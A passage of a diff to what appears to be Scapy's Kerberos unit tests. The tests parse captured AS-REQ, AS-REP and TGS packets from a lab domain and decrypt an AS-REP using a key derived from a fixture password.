LV\xda\x0f&>,~\xb3\xecK\xe76v\x9a\xc3\x88\xe3\rj\\/\xd6\x9e_X\x14z\xc2w\x1d.|\xbf\x18\x01\xc8`].\xd2\xc2\x1e\xd0\x89\x8f\xd2\x18\xb9U\xaf\x98\xe9V\xe2\x19\xa1\xbb\xc45\xd9\x16\x08c\xaf$\xef\xf2\xf4S\xeco\xa1\xa1\xe5)\x99\xc9b#[\xd1:O\xbej\xb91\xb3i\xbepb\x06\xd8\x14\xc3\xdf\xbb\x18\xbf]\xf1\x82+\x18*\x85D\xecy\x0eu_\xe2\xfa\xbcd\x82A>\x88p\xa2\xc1\xf6\x9c\x89Qj\xfdM\x99\xd1\x84r\x0fp\x06$\xab\xc2\xb5\xae4\xe8\xf1\xbb}\x98\xedWX\xe2*uB\x93\x11\x1c\xc7f\x1c\xce\xc9\xff\t\x88\x94\xddN\xcf\xa68O\x0c^I\x9ew\x81\xba\xc3\xbc\xa8\x07\x8b\xd4\xdf\x7f(\xc2\x15gX\xd0oN\x00u\x1aU@\xbd\xb8\xa9)Ur\x94\xc1\xcf\xa1\xd8k\xc1F\x19\xd3rR\xaa\x93\xe2\x06D#\x12\x07M\xe3\x15\xd6\xd0\xb3\xa6\x89\x0c\xfeLO6\xe6\xf0w\x1a\x80\x0f\xffO\xf2N\xf4(\n\xdb-\x96`\xa4\xb7\xd3g\x16\xbfY\xff\xad\x95\x19\xd9\x9cS\xaa\xe3\x06W\xf3\xc2\x18it5\xda\x1c\x99\x8a\xaf\xfa"MT\xc7$#j,P\x9b\xf9\r\xbbA\xd0w\x15.\xc3PC\xc4\xe7vL/\xca0h7\x1c4z\x8bS@\x0ej\xb4q\xde\x19\xd8so\x9c\xea\x8f^w7\x1e\x92\x1c\xcc\xe2\xa60\xe8\xce}\xee\xb1\x87F!n\x80\xe4l"\xed\xc2fI \xb9\t\x14\t\x8d\xect\xa4\xb48\xe0\xfd\xf3\xe5\x8es\xd2\x08;\x9f\xb2\xb8q\x1bX\xadd\xbb\x07z\x16\tZ\xb0z1+h\x0e\xf7\x98w\x0bX\xf0W\t\xa6\x86.\x1e\x9c\xc2\x9d\xac+\xca\xdf&\xa9\xf3\xcb\xa7\xca\x1fn\xe8\x8a]h\xf6\xeb\xe9\xd4\xa0\x16\x1b\xb4\x8d\xc7\xaf\xe3\xf0.\x85\x1e\xc2\xa5\xf2DhhgQ\xe0\xb8y\xb8\xbd\x98\xf8\xa0\rW\x93/\x07>0\xf5\x92Y\x15Y\x0bD\xdb\xd6\xac#\xd8z\xbdeY\x87\xf2\x97\xfdZ\x0c\x1d\xbc\xefXONv\xc9\xfdp\xdd^\x16\x83\xc3\xeb\x9e\x96+\xe8\xed\x0c<$\x83A\xeb\xc6e\x94\x0c\x11\x19\xb4\x99\xcd\x17\xeb\xcb.\x0b}\x01i\x88\x03R\xde\x1a\xea\x03\x10\xa9Z\x8e\xf7\x87\r\xa6\x08@\xf7\x96\xc8\xa5g\xde\x8dE\xf8\xb0\xe8\xe6T\x80=\x0cm\xe0z\xa5\x03\xa2X\xed\'\x17\x001O\xee\xfb\x87\xbe\xf7\xbbS\xc1p\xaeZ\x17\x92}\xc2\x07\x01\x81\xaew\xd9\xc5\x9c\xe5k\x8d+\x13\xd2\x00Q\xd4\xe5M\x9d\x06\xc7)\xac\x06\xb2+\xd1\x83\xcb\xfe\xb9\xf9\x0bbRN\x04\xe7\xd8\xa0\xf9\xe3\xc3m\x18\xc4\x108\xfa\xa6\x82\x01:0\x82\x016\xa0\x03\x02\x01\x12\xa2\x82\x01-\x04\x82\x01)/pDi\x13\xee\x0b\x8ehN2\x01P\x19|\xda\x1a\xde\xec\xde\rt\xcbe7\x00-sG&\x8b\xfc\xa4\x92~~[,\xd5\rAj\xd6[\xbe\xeeB\xf8X\\x\xa6$Z\x83\xf6\x1bq\xc5\x8fm\\\x94\xd7l\xc5\x89#\xcb\xcd\xaf\xff\x15\x1b\x8f;7\xb0\xc8u\x19\xb1\xd0\xb0\x93\xa7z\x9cz\x14\x0b\x86q\x01\xb8<\xa7\xa4\xceb\x1f\x88\x14\xe3S0\xe3]\xa5\x9b\xa0\x0e\x97#\x87\x9a\xe0\x90a\xdfj.\x1e6x\x87GV\xc0/\xa4\xab}\xdbS\xd5\xff\xc1\x9f\xeb\xae\xcb\x04\x071\xf1x\xff\xe5M\xfc\xbct\xea^e!\xce!|\x893/\xa1\n.\xb7T\xc5Ph\t\xf1\xbak\xcd\xdb\xff+c\xab\xcfY\x8a;*/\xd8\xa5\xd0\xd7c\xc6\x02B\xed\x82\xcf\xa0\xe5\xdf@rq\x8cRG\x1a\xdey_#\x18\t\x9d\xac\xa4\xfe\xd0\xeb{\xcb(E\xb8\xac\xc9\xe3\x06\xe0\x15}\xb89\xb1L>\x060\x93\x1dtl\x1f\xa0\\s\xdb\x85\x82\xdf\xb3L\x80\xe7/\xae\x0e\x11V\xdeH:J K\xb1g\x95\n\xc2\xd2\xc2\x83k\\6\x0eg\xd0{v\'\xa4\x1c\xe2\x10-\xeb\'\xc7?F\xd8J\xe8\x90Z4V\x12\\\x9e\xc2\x05\xfc|\xb3\x01\xe5\x1b\x14\n\xaa\xff\xb9\xff\x07\x03L\x10\x1d\xc8\xa8\xed\x00A\xf3\xf2\x16\xa3\xd8":!\x04m\x10Uo\x11\xa5d5\xc1\x1es\xde=\xa6\xdd\x9b\'\x03(L(*\x92C\xca\xc8\x92\x1b\x08\x06z/\xb4=\xd8Mz\x816\x9f-\xc0\xe8\xcf\xd2A\xfeyk)WH\x11\xdf\'\xf4\xefG\xfc\xef\xd0\xb5\xec\x91\x87\xf4}b\xb2\x1e>\x1f\x9d4~h\xa0=\xfd(i0|\x03\x98k\x05#Y\xe35\x1c\x7fn\xac\xf2\x896\xa6p\x13\xc1\x94&Q\x8f\x1c\x07\x8cN\xb0\xb6=\x83R46\x04\xfa\x86\xbc\xc1UO\x03\xd8\x0e\x0c\x9f\xbd/\x02f\x90\xa8\x9e\xd3 \xb4\\\n!\xf9"\xc3\n\xe7\xe2\x92\x05t\x11\xa1\x9e<$i+U\\d1\t^\'\xb7\x12\xfd\xe5\xd7\xc4\xd4\xb2\xa9!`\xd8\x97\x8b\x9a\x0c:\xcc\x85\x90)_\x11\xefR\x00\xe5k\x12I\xe2\xf6\xf4h\xa4.\x97\xf2\xea?\x1e\xf9\xcf\xe6\xac\xc7\xdd\xd0\x8f\x0bml\xcb[\x801\xce\xae\xd28\xc0\xe9\xb1\xb0\x19\xc9r\xd2\xd4=\xdaw\xff\xc7\xbd\xe7\xf8\xa9\x8d\xc6\xda\xa9y\x9b\x98\x19\x05\xb1]\xbc\xe2\xe3\xaf\x8c8\xcd\x12\xf8\x90\xea\xd0\xe3\xc3\xba|\xe28(\x8f\x99\xba\xden\xefJ\xc4r\x9e\x17\xe8&\xd6\xe4\x83 \x92\x19d?\xa6\xcc\xbd\xff\xa5\x83@\x17\x13\xefY\xd7\xa7\x1e\xe4\r\xd2\x846\xf8~!L\xe5\xdd\xb3\xb4(\x14\x1e\x1a\xfcP\x8ezE\x1ffFJ.\x82\x1f\xd3\xc5l\x9e\x0b3u4b\x0c\x94\xd6R\xc0\xe5\x96\x83\x95\xa1\x12\xa2\x18;\x96\x9di\xca\xc8\xd9\x15\x81\n\xa9\xc3\xe8\x1eS \x93j\xeb\xa4\x81\xc60\x81\xc3\xa0\x03\x02\x01\x12\xa2\x81\xbb\x04\x81\xb8-Y=\xd3\xfc\xeb \xd8\x16\xd9\xb2O\xfc1\xc9\xd5\'zN\xd2\xb6\xf4\xc6Q7\xaa"B\xe7\xac3\x19\x86\xad\xd5@\xa6\x1f\xd8a#EN\n\xba\xc3\xd95\xe5\x93\x07,j\x97V [o\xe3\x91!d\xe6|\xa4\x94\x14\x9dj1J\x82as[\x83\x80\x99\xa3\xec\xc1\xda_\xe7\nLej\\\x9eW\x11\'7\xfeq=)\xef-\xf5K\x15\x8e\xbf\xb8]m\xb6\xc2\xce\xb4xN,\xdb\xbeaB\x86\'\x068\x05\\\xafF\x08DFpJtX\x0c\xc1\xdfw\x9b\xb1\xf8x\x93\xac\xf9\x14X;h\xe3E\xc0\xe4i\x19\xe5:\xe7\xe5\x86\xa7{\x96\t|\x9aG\xc0\x169\x08\x03A\xa6\xc4j\'-\x07\xf4\x9c\x88"\xc00\x81\xe0\xa1\x04\x02\x02\x00\x88\xa2\x81\xd7\x04\x81\xd4\xa0\x81\xd10\x81\xce\xa1\x170\x15\xa0\x03\x02\x01\x10\xa1\x0e\x04\x0cW\xb7\xdc~\x96.\'\x92\x1a\xdfh\xb9\xa2\x81\xb20\x81\xaf\xa0\x03\x02\x01\x12\xa2\x81\xa7\x04\x81\xa4\x9b\xfc\xb3\x8c\xc5\x1e\xa1q\x19"\xf0\\\xa7\xa6`\xc9:\xd6KA\xd5\xac\xa9$\x8a\x18z\x81\xce\xc9\x0f\xe0\xd5\xad\x848t\xb7\xe3\xf1\xffC\'\x16Z\xc6\xe1of5\xf2R\xb31\xbf\xfa\xaf$\xe5\x1d\xa8\xd3sf\xbb$\xc5%\x17\x0c\x98\x98\x08\x85\xd18\x91o\x8d\x83\x86P\x9e\t\xd9V\xd1\xe4\xeb\xa8\x11\xd6\xaa\xb7\x88\xde\xbe2\xbf7\xb8\xca\x1c\x90\x10GB\x06\x046\xc8\xff\n\x02$_\xce\xcfk\xc9xd\xe5\xbf!4q\x83*/B[\x8fJ\xfa\xf4\xad97\xd8\x8f,3b\xb7\xe0\x94\xca\n\x12]\xc9\xfc\x7f\xbb{2p\xa0\x8f1e6$\xa4v0t\xa0\x07\x03\x05\x00@\x81\x00\x00\xa2\x13\x1b\x11SAMBA.EXAMPLE.COM\xa3,0*\xa0\x03\x02\x01\x01\xa1#0!\x1b\x04ldap\x1b\x19localdc.samba.example.com\xa5\x11\x18\x0f20150130011709Z\xa7\x06\x02\x04T\xcaN\xf5\xa8\x0b0\t\x02\x01\x12\x02\x01\x11\x02\x01\x17') @@ -63,7 +63,7 @@ assert pkt.root.reqBody.kdcOptions.val == '01000000100000010000000000000000' assert pkt.root.reqBody.sname.nameString == [b'ldap', b'localdc.samba.example.com'] assert pkt.root.reqBody.till.val == '20150130011709Z' -= TGS-REP += Parse TGS-REP pkt = IP(b'E\x00\x06V\xff\xff@\x00\xff\x11\x00\x00\x7f\x00\x00\x15\x7f\x00\x00\x1d\x00X;\x97\x06B\x00\x00m\x82\x0660\x82\x062\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\r\xa2\x81\xe90\x81\xe60\x81\xe3\xa1\x04\x02\x02\x00\x88\xa2\x81\xda\x04\x81\xd7\xa0\x81\xd40\x81\xd1\xa0\x81\xce0\x81\xcb\xa0\x03\x02\x01\x12\xa2\x81\xc3\x04\x81\xc0\x8cqa\xdf\xfe\x13<7\xc1:\x8d\x0bshxOC\xd6\xcb\xbdz\x1a\xf5\xaa\x9c8\xce\x9f\xed\x99\xeb\xd8A\xba\xdcj\xffF4|\xc7\xab\x84~\xb9\x8f\x04\x0e<\xf1p#\xf7kK\x86\x05+%\\:\xcb^\xc8e\xeb\x0f\x81\x92\xa0\xf3"\xcd\xbb\xf3\xb9\x91\xc8\x94\xa27\x8c\xae\xc44\xa8\xd27\xd1J`K\x93M\xe3\xefUy\xda\xc6\xb7\xe6\xc8\xed\xa79\xd4\xd5\x9a\x12f\t\x1c\xb5\xa7A\x95\xaf\xa1\xac\x1d\xde\xfb\x1c\x0ec<5\t\xabYU\xd4\xd4\r\xf4]\xec\x00t^K\xed\xca\x81\xad\xbe\x99\xdc\x10g\x9c$\xfb\x82s?\xf4\xb9\xa5\x8eW\x02\x7f\x87A\xf7\xc4;2q \xd2\xbc\x10\x13\xc9\xa0w[\r\x01Pt\x7f\x95^\\\x8e\xbe\xee+\xa3\x13\x1b\x11SAMBA.EXAMPLE.COM\xa4\x1a0\x18\xa0\x03\x02\x01\x01\xa1\x110\x0f\x1b\rAdministrator\xa5\x82\x03\xe5a\x82\x03\xe10\x82\x03\xdd\xa0\x03\x02\x01\x05\xa1\x13\x1b\x11SAMBA.EXAMPLE.COM\xa2,0*\xa0\x03\x02\x01\x01\xa1#0!\x1b\x04ldap\x1b\x19localdc.samba.example.com\xa3\x82\x03\x910\x82\x03\x8d\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\x01\xa2\x82\x03\x7f\x04\x82\x03{\x97\x9c\xac\xf1\n\xe6;\xd8\xe28m\xba\xb7\xea#\x19\xd3Zf\x1c@\x00H\xf9"\xe7\xb4\xf3&3\x02X\xb5\xc0{e\xffm\xc8\xcf\xe2\xf9p\xb57~\xd8\x91?/5\x7f\xde\xc4/\xaa\x1c\x08pQ(\xff@\x8e\xb7\xf0\x91N\xbcK&0\xbdWo_W\xf8\xbe\xd6(\xd1`\xba\x8f.\x86\xc29\x88\xe5:,\x16ui\x98y\x100Q\xf6k1\xe6\xe5-e\xdc\x80\xc0@\x87i9Z\x7f\x07\xeb\xf2\x8f\xb1\xc4\x83*z\xbbq\xbfZs\xd7\xefFAZ\x84w\xa2-\xc8\xca\xa3\x84\xa2\x0bm\xce7 pIX\xa1\x05\x83\x01t\x06\xabI\xa3dp\xe3\xaa\xd0\xd6\xb0!\xfd\xbea\x9buL\x0f\x99\xbfg\x11|J?\xfdl\xcd\xb6\xae\n\xdc\x06kS\xc60\xad\xf3\xacq\x0f\xd5lbX\x8d^\xf9\x83\x80ax\x1c\x12\xaa\xe3\x07Y\x1ef\xae\xd6\xc9\xd4y\x94\xb5\x93\x83\x03m\x03U\xf3\x9a}L3Xi \xf94\xffFf}\x99\xfd\x04I\xe3\xcd\x9f\r\xb7>r\x0e\xcf\xeb$\xc8\xdcO\x95\x88\x04\x1c\xf0\xf9\t2\x92\xc4\xe3\x10\xfa\xb0\x14\xb5\xfb\xf0.\xcc\xa3\xdc\xab\x0f\xd76\x8e\xbf\xd8\x7f@U-x\xc8 \xd42\xf8\xfd\xce8\xdbl\x16\xc1\xaa\xb3\xe32\x87\xd3\xecIc-\xcf\xab7\x0b\xd9b\x9f9\x06\x88|q\xca[\xb8\n\xfb\xf7\x0bl]:\xbc\xe1\xab:K;w6\xcf\x1c\xa6\x1a\xec\xc0\xe2\xea\x89\xe6u\xe4(\xec\xec\xda!\x06\xfd\x9c\xeeZb4\xeb\xff\x06j\xbc\xfe\x90\xb6\x93\x0b:t\xf1|\xa3`\xfb\xc5\x9a\xa5\x11w\xb2}oP\xccj\x10M\xf3\x98\xbdCj\xa9\xcd\x93\x83\xf9N"\xbc!z8\xf6\xca\xe3\xbc\x04\x92\x14\x16i\xa40\xbf~\xb5\x12\xbeC\x83\x9e\xbdH\x13\xcasxFM\\\xd7\xc9\xd3B\xacM\xe7\x1c\x8ej\x12\x197\x06\xae\xbd\x1c\x84J}\xab\x8b\x05F\x8a\x13\xbe@]\r\xc2-\x9fA\x19\x94Jl\x12\xba\n\xad\x16T\x94\xb85U\xc1o\t\x04\xb2F\xa1\x17M4\xc3\xb2N\x17\x8f\xfe\x190\xc2\x11q\xc3A\xd9\xafn\xc8\xc909\xc4\x05\x03\xf3\xb2\x8e\x97\xfcL>E`\x11`\xce\xe5n\x15\x84\x84~\xdfZ\x98S\x0f[\xc3\xaa\x8e\xcf\x9cU\x93\x94\x04>\x05\x90\x1c\x00\x1a7\xb7\xe9\xc9\xc9\xb6Eq\x13\x1e\xb5\x86\xc3}&\xe7\x1b\xe5(\xce\xe3b\xd5\t\x11\x1f\x1e\xe3;O\xd9J\x85\xc5\xfa\x82\xd2\xc9\x88\xc5\xa8\t\xf5\xdb\x85vi\x1d\x97\x12j\xe8\xabL\xf0J\xd3\xbe\x1c\x7f\x1a\xb7$k\x87\x9e\xc3\x9aH\x1e\x96>\x19\x0fE\xff\xe2\xc8\xc2|W4\x12\xe4\xc7G[\xdc\x93\x17E%ur\xcem\x169\xf2I\xab\xbb\x8d\xca\x0fM0n\x19\x06\xeb<\x03\xa7fw^\xdd(V:\xc0\x14+\x08L\x17\xbe\xc9\xa6\x82\x01\x1e0\x82\x01\x1a\xa0\x03\x02\x01\x12\xa2\x82\x01\x11\x04\x82\x01\r\xeeN\xd0\x1b\xa0\xc4\xb0C\x12,\xdd\xbd\x96\xe8\xbai"j\xbc[O\xff}Z\n5%\x98\xfc{`Q\x92\xe4\x95\x1azM\x15b\x98Ah\x02\xb2V\xd5\x0f9\xb3\xd5\xcf!\xdf\x1e\x9c\xd4\xc08\xc0|\x10\xc8\xb0ol\xcd\xa6?\x19\xfa\xb9\x0b\x9d\x96\xaa_,O\xe2 @4;\x1f!\x12\x8e\xf3h\xbc\x95\xa2\xcfE\xaey\\U\xdcc\xbe\xecN\x9e\xaa\x9d\x83\x1a\x9ad\x11\x15X\xdf)L\xd8Z\xe3\xa2&\x1c\x1b\xf8\xd1\x8e\xfb~\xdd\x16^\xfa\xf9\x15\x96s\x03\xf8T\x86\x12B\xdf\xf7m@\xfa\xf5L\xdd\xb6\xa8\x9af\x90\x90\xcd\xa9\xdf\x97`\xd3\x1c)\xc5n\xe8\xc1\xe0\xb4\xc7"\x16\x91<}\n\x94\xec\x8d\xc6.d\xe1\xf5/i\x89$\x9a\xebW\x0c\xf7\xfe\xc5\x12\x10\xb8\xa5\x193\x88hR\xa0\xf7t\xa9\xc6\xc2\x15E\xbd\xd6\xf09\x1d\x12\x83o\xb35>o\xa0\x98\xda\xf2\xad-1\xd0\x94\x12Be\xe0\x04\xe0\xf7\xcf\xbbAZ\xf5\x1c\x88\xf5\xef\xb2\x9bi\xdc\xd0\x07\x8f\xca\r^\x92\x02\x15\x87\xef\xd5\x90\xb5') @@ -74,19 +74,133 @@ assert pkt.root.ticket.sname.nameString == [b'ldap', b'localdc.samba.example.com assert len(pkt.root.ticket.encPart.cipher.val) == 891 assert pkt.root.encPart.etype == 0x12 ++ Kerberos dissection and decryption tests + +# For the following tests, we use an account with no preauth and request a DES-CBC-MD5 sessionkey on Windows. +# (unconventional but allows us to test edge cases) + += Create Key (RC4_HMAC) + +from scapy.libs.rfc3961 import EncryptionType, Key +key = Key.string_to_key(EncryptionType.RC4_HMAC, "Password1!", None) +assert key.key == b'\x7f\xac\xdcI\x8e\xd1h\x0cO\xd1D\x83\x19\xa8\xc0O' + += Parse AS-REQ (no preauth) + +pkt = KerberosTCPHeader(b'\x00\x00\x00\xd4j\x81\xd10\x81\xce\xa1\x03\x02\x01\x05\xa2\x03\x02\x01\n\xa3\x150\x130\x11\xa1\x04\x02\x02\x00\x80\xa2\t\x04\x070\x05\xa0\x03\x01\x01\xff\xa4\x81\xaa0\x81\xa7\xa0\x07\x03\x05\x00@\x81\x00\x00\xa1\x120\x10\xa0\x03\x02\x01\x01\xa1\t0\x07\x1b\x05User1\xa2\x0e\x1b\x0cDOMAIN.LOCAL\xa3!0\x1f\xa0\x03\x02\x01\x02\xa1\x180\x16\x1b\x06krbtgt\x1b\x0cDOMAIN.LOCAL\xa5\x11\x18\x0f20231213110146Z\xa6\x11\x18\x0f20231213110146Z\xa7\x06\x02\x048\xa6\xb8x\xa8\x080\x06\x02\x01\x03\x02\x01\x17\xa9\x1d0\x1b0\x19\xa0\x03\x02\x01\x14\xa1\x12\x04\x10WIN10 ') + +assert pkt.len == 212 +assert pkt.root.padata[0].padataValue.includePac +assert pkt.root.reqBody.etype == [0x3, 0x17] + += Parse and decrypt AS-REP (no preauth, RC4) + +pkt = KerberosTCPHeader(b'\x00\x00\x06\x1dk\x82\x06\x190\x82\x06\x15\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0b\xa3\x0e\x1b\x0cDOMAIN.LOCAL\xa4\x120\x10\xa0\x03\x02\x01\x01\xa1\t0\x07\x1b\x05User1\xa5\x82\x04\xa0a\x82\x04\x9c0\x82\x04\x98\xa0\x03\x02\x01\x05\xa1\x0e\x1b\x0cDOMAIN.LOCAL\xa2!0\x1f\xa0\x03\x02\x01\x02\xa1\x180\x16\x1b\x06krbtgt\x1b\x0cDOMAIN.LOCAL\xa3\x82\x04\\0\x82\x04X\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\x03\xa2\x82\x04J\x04\x82\x04Fm[\x1a\xa0G\xd5 \xee\x9c\x0c\t\xfb\xc3\xee\xd8Ki\xca\xaa6~\x87\x0fu\xde\xfd\x8d9\trl\x9d\xe9\xf0\x10\x0b\x85SO\xc2\xae0\xb1\xc1\x9a\x8c\xa0\xcb/\xad\x94\xaa\xe0\xb1R\'C\xd0uqw\'\xa6zF\x9d7\xf7\x08\xd8[(\xd5\x11\xc6:\xf5\r:\xde\xf9\xdd\xd9/T\xaa\xe1Q/\x9eD\x91\x01\xa8X\xf0O\xde\x88\xcb\xc4\xc7\x87\xb1pv\xd4\xb0r\xc1\x10\x80W9\xf7\xe7+\xd9M:\xf2\x8f\xdf\xa4\xc1\xa5\x95lU\xc02A\rf\x0b\xef\xc8\xc9A\'\x87\xff\x92W\xd4\xed\xb9\xd0|{\\\xbd\xf2\xfb%h\xe3\xb8\xccs\xec_\xe7\xf9\x90\xae\xb8E\xab\xf6!\xe6z@\xf1-nO\xcf X\x1eh\x86L\xba\x0ef_\xde]\xe2_\x94\xb0\x13\xccN\r/\xd3\xf2\x81\x07\x1b\x14\xfd6\x00Y~\xc0?\xaeYb\x7f\x16\x139\xe5P:\x93\xe3N3\x08iB\xc5m\xa3\xb5\x10d\xd1~\x0eb~wk{u\xec\xbe_!w{\xb7Z\\\xcf\xf5\xd9\xc3\xea\xe5\xfd\xfd\x03\x18\x07\xab\xe3\x06\x07\x9a\xa1\x9c\xc2C.\x0e\xb7c\x14\xf6\\\xd2\x82\xf2\xfc\x01>\xed\xfb6&<\x8f\xab\xe0\xfe5\x86!e{\xadr\xa3\xab\x87\xbc;p\xbdh|\x04\xf5\xffJ6\x94\xca\xacLc\xeb\x91\x14\xb94\xe7\xf4k+_V\xefh\xd4G@\x16\xc7?\x92\x94\xa3\x87\x81#\xbc\xa6>\xefh\xdd\x91\xe2\xce\x06\xba+\x96\x83\xb5n\xb2\x0c\xc3\xf9\x1f\x15\xe8\xba\x10\xf7V\x8b\xf4\xc1Rg\x86S\xfa\x89\x90\xe4\xceJ\x8d4\xc1Bh\xb5S\xa8\']8z,j-z\x0c\xc28Z\x06d\xd9\x90\x19\xf4\xc2)\xc7\x86\x9dk\x17{\x12/\t\x8a.\xc4\xe7\xdb~t\x92\xadx\xb2\x91\xb5\x96@\xf6\xa8ftuM\xdf\x17\xc4V\xa0y\xd0\xdf\x1f\x1a\xc9y>\xc0\xd1\x85\xde\xf4\xee#\xc8\x82F\xc8H\xa6h\xe8\x02H\x9bE5U`o\x98\xc0P\x9c\xd9L\xb9D\xff\xd8G\xd0k\xc0\x07\xda\xd2#\xc3"\xb7\xb8\xf2)\x9c\x164\xaa\xe4\x18-i(\xabn\xb7\xeaB5\xe4\xb7\xdc$$\x9e|\xcdA\x03\xf3\xd7n\xd3\xc1\xd7\xe6e\xb6\\\xd3)\xfah\xb7\x88\x0e\xeby \xfe\xd2!.Q\xa0\x97\xa8\xe2O\x1d\x99\x02#9\xf4\x1c\x0e\x1fN\xc9;\xd5?\x0fm=\xee\x0efj\xc1\xcb\x14\xb5\xa9}\xe2:F\xd7\x1d\x07\xfd\xaf\x96D\xfc\x007q\x11\xe1\xf6\x12\xdc%\xf7\x92ML\xbfH$\x10\x8a\xb9\xfbp\x9b\xff\x07\\N\x83\xf5\x11\xaex\xf2\x171F\xe3\xfc\xf6\x89\xc3\xdf]\xaa:\x8f\x99\'\x16` P\xe6X\x04\xe9@\x89\x90\x8cP\xc5b\xf82\t+\x14+\xb7\xa3\xfa\xba\xa4*r\xb41i\x070!\xba\xc8\xb17\x06\x12\xf2\xce\xa0\t9P\xd9]\xe4p1i\xf3\xed\xc0oT\'\x99\xc0\x7f\xa8s\x0bW\xc7S\x90w\xe6\xa7\x91\xe1\x84\xd3V5$\x92\xa3\x81\x90\x02\xdfVu\xd7\xb7x\x13+p\x8djP\xfa\x0eL\xc5}=\x12t\xc3\xa6\xa5\x12\xd9H+w\xea\t\x92km\xf9$\x0c\xa0Y\xda\xea\x15\xd0\xa1\xbe\x85\xa3\xd3\x9fQ\x1a\xd8A\xabf\x9d\x9c \x19\xa5\x8e\t\xb4c\xac\xe3\x99\x00\xf4i\xc4\x14c\xd7h\xd3\xc6x\x11\xa5\xa0`\xe5\x8d"\xae\xa3\xa7\xba\xb8\xc4~\x87\xad\x1d\xa6\x19\xe3v\xdd^(-w7d\xd1\xb0D<\xeaW\x84\x90=\x9e\xee\xa3\xe3u\xa7\x074\xf3:6{\xbd-\x87\xfee\xd6b\x8a\xe5\xa9v\x0c\xe8N\x1c\x10\x12\x91\x1e~\x92\x02Uh)\xdd\xb5f\xf9\xcc\xadf\xf3:\xa7\x9f\xfd\xe1>\xd19\x10U1\xf0\xf8\xb1G\xe8H\xcb!h\xab\x14q\xe51d\xb2A\xf07\xda\x11\x81\xd9\xff') + +assert pkt.root.cname.nameString[0].val == b'User1' + +asrep = pkt.root.encPart.decrypt(key) +sessionkey = asrep.key.toKey() +assert asrep.encryptedPaData[0].padataValue.flags == 0x5001f + += Parse and decrypt TGS-REQ (DES-CBC-MD5) + +pkt = KerberosTCPHeader(b'\x00\x00\x05\xd1l\x82\x05\xcd0\x82\x05\xc9\xa1\x03\x02\x01\x05\xa2\x03\x02\x01\x0c\xa3\x82\x05=0\x82\x0590\x82\x055\xa1\x03\x02\x01\x01\xa2\x82\x05,\x04\x82\x05(n\x82\x05$0\x82\x05 \xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0e\xa2\x03\x03\x01\x00\xa3\x82\x04\xa0a\x82\x04\x9c0\x82\x04\x98\xa0\x03\x02\x01\x05\xa1\x0e\x1b\x0cDOMAIN.LOCAL\xa2!0\x1f\xa0\x03\x02\x01\x02\xa1\x180\x16\x1b\x06krbtgt\x1b\x0cDOMAIN.LOCAL\xa3\x82\x04\\0\x82\x04X\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\x03\xa2\x82\x04J\x04\x82\x04Fm[\x1a\xa0G\xd5 \xee\x9c\x0c\t\xfb\xc3\xee\xd8Ki\xca\xaa6~\x87\x0fu\xde\xfd\x8d9\trl\x9d\xe9\xf0\x10\x0b\x85SO\xc2\xae0\xb1\xc1\x9a\x8c\xa0\xcb/\xad\x94\xaa\xe0\xb1R\'C\xd0uqw\'\xa6zF\x9d7\xf7\x08\xd8[(\xd5\x11\xc6:\xf5\r:\xde\xf9\xdd\xd9/T\xaa\xe1Q/\x9eD\x91\x01\xa8X\xf0O\xde\x88\xcb\xc4\xc7\x87\xb1pv\xd4\xb0r\xc1\x10\x80W9\xf7\xe7+\xd9M:\xf2\x8f\xdf\xa4\xc1\xa5\x95lU\xc02A\rf\x0b\xef\xc8\xc9A\'\x87\xff\x92W\xd4\xed\xb9\xd0|{\\\xbd\xf2\xfb%h\xe3\xb8\xccs\xec_\xe7\xf9\x90\xae\xb8E\xab\xf6!\xe6z@\xf1-nO\xcf X\x1eh\x86L\xba\x0ef_\xde]\xe2_\x94\xb0\x13\xccN\r/\xd3\xf2\x81\x07\x1b\x14\xfd6\x00Y~\xc0?\xaeYb\x7f\x16\x139\xe5P:\x93\xe3N3\x08iB\xc5m\xa3\xb5\x10d\xd1~\x0eb~wk{u\xec\xbe_!w{\xb7Z\\\xcf\xf5\xd9\xc3\xea\xe5\xfd\xfd\x03\x18\x07\xab\xe3\x06\x07\x9a\xa1\x9c\xc2C.\x0e\xb7c\x14\xf6\\\xd2\x82\xf2\xfc\x01>\xed\xfb6&<\x8f\xab\xe0\xfe5\x86!e{\xadr\xa3\xab\x87\xbc;p\xbdh|\x04\xf5\xffJ6\x94\xca\xacLc\xeb\x91\x14\xb94\xe7\xf4k+_V\xefh\xd4G@\x16\xc7?\x92\x94\xa3\x87\x81#\xbc\xa6>\xefh\xdd\x91\xe2\xce\x06\xba+\x96\x83\xb5n\xb2\x0c\xc3\xf9\x1f\x15\xe8\xba\x10\xf7V\x8b\xf4\xc1Rg\x86S\xfa\x89\x90\xe4\xceJ\x8d4\xc1Bh\xb5S\xa8\']8z,j-z\x0c\xc28Z\x06d\xd9\x90\x19\xf4\xc2)\xc7\x86\x9dk\x17{\x12/\t\x8a.\xc4\xe7\xdb~t\x92\xadx\xb2\x91\xb5\x96@\xf6\xa8ftuM\xdf\x17\xc4V\xa0y\xd0\xdf\x1f\x1a\xc9y>\xc0\xd1\x85\xde\xf4\xee#\xc8\x82F\xc8H\xa6h\xe8\x02H\x9bE5U`o\x98\xc0P\x9c\xd9L\xb9D\xff\xd8G\xd0k\xc0\x07\xda\xd2#\xc3"\xb7\xb8\xf2)\x9c\x164\xaa\xe4\x18-i(\xabn\xb7\xeaB5\xe4\xb7\xdc$$\x9e|\xcdA\x03\xf3\xd7n\xd3\xc1\xd7\xe6e\xb6\\\xd3)\xfah\xb7\x88\x0e\xeby \xfe\xd2!.Q\xa0\x97\xa8\xe2O\x1d\x99\x02#9\xf4\x1c\x0e\x1fN\xc9;\xd5?\x0fm=\xee\x0efj\xc1\xcb\x14\xb5\xa9}\xe2:F\xd7\x1d\x07\xfd\xaf\x96D\xfc\x007q\x11\xe1\xf6\x12\xdc%\xf7\x92ML\xbfH$\x10\x8a\xb9\xfbp\x9b\xff\x07\\N\x83\xf5\x11\xaex\xf2\x171F\xe3\xfc\xf6\x89\xc3\xdf]\xaa:\x8f\x99\'\x16` 